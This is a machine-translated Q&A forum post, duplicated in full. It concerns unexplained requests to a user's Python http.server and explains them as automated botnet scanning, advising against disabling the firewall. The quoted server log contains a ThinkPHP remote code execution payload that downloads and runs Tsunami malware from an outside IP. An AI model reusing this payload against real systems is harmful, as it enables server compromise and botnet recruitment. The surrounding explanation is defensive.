Python 3 http.server - 一个奇怪的 IP 地址试图连接我的服务器
Python 3 http.server - A strange IP address tried to connect my server
几分钟前,我 运行 基于 python 的服务器与我的朋友共享了一些文件。我禁用了 windows 防火墙,以便他可以连接并下载文件。当有人尝试连接服务器时,Python 会显示他们的 IP 地址和他们请求的路径。
我不认识的人试图获取我的 index.php 和 运行 wget。我查了他们的 IP 地址,好像他们来自日本。那么,这个人是如何知道我的 IP 地址并试图连接到我的计算机的呢?我只在 WhatsApp 上分享给我的朋友。
我已经做过很多次了,这是第一次发生这样的事情。
61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -
这是一种很常见的黑客技术。黑客会使用看似 运行dom 的 ip 地址(碰巧挑出你的)来扫描互联网并寻找开放端口(通常是 22、80 和 443 等常见端口)和 运行 一堆常见的漏洞努力获得对机器的控制权。
许多僵尸网络都是通过攻击 运行dom ip 地址而创建的,希望他们的路由器上仍然设置了默认用户名和密码,或者使用带有已知漏洞的过时软件。
在您的情况下,他们似乎希望您的网络服务器 运行 是 PHP 软件的特定组合。您的 IP 地址可能是他们 运行 进行相同查询的数千个之一。
有很多人使用 运行 工具,例如 Masscan,使用自定义脚本寻找易受攻击的 Web 服务器。大多数时候,这种脚本试图获得反向 shell,以试图建立僵尸网络军队。 windows 连接到互联网的机器在 SO 完成安装之前遭到黑客攻击。
这就是您不应该禁用防火墙的原因:从没有保护的情况下上网到有人试图侵入您的系统所需的平均时间最多只有几分钟。
相反,您应该找出您朋友的 IP,然后只允许那个 IP。除非您的朋友有静态 IP 地址,否则请在他们完成测试后删除该允许,因为其他人稍后可以获得该地址。
几分钟前,我 运行 基于 python 的服务器与我的朋友共享了一些文件。我禁用了 windows 防火墙,以便他可以连接并下载文件。当有人尝试连接服务器时,Python 会显示他们的 IP 地址和他们请求的路径。
我不认识的人试图获取我的 index.php 和 运行 wget。我查了他们的 IP 地址,好像他们来自日本。那么,这个人是如何知道我的 IP 地址并试图连接到我的计算机的呢?我只在 WhatsApp 上分享给我的朋友。
我已经做过很多次了,这是第一次发生这样的事情。
61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -
这是一种很常见的黑客技术。黑客会使用看似 运行dom 的 ip 地址(碰巧挑出你的)来扫描互联网并寻找开放端口(通常是 22、80 和 443 等常见端口)和 运行 一堆常见的漏洞努力获得对机器的控制权。
许多僵尸网络都是通过攻击 运行dom ip 地址而创建的,希望他们的路由器上仍然设置了默认用户名和密码,或者使用带有已知漏洞的过时软件。
在您的情况下,他们似乎希望您的网络服务器 运行 是 PHP 软件的特定组合。您的 IP 地址可能是他们 运行 进行相同查询的数千个之一。
有很多人使用 运行 工具,例如 Masscan,使用自定义脚本寻找易受攻击的 Web 服务器。大多数时候,这种脚本试图获得反向 shell,以试图建立僵尸网络军队。 windows 连接到互联网的机器在 SO 完成安装之前遭到黑客攻击。
这就是您不应该禁用防火墙的原因:从没有保护的情况下上网到有人试图侵入您的系统所需的平均时间最多只有几分钟。
相反,您应该找出您朋友的 IP,然后只允许那个 IP。除非您的朋友有静态 IP 地址,否则请在他们完成测试后删除该允许,因为其他人稍后可以获得该地址。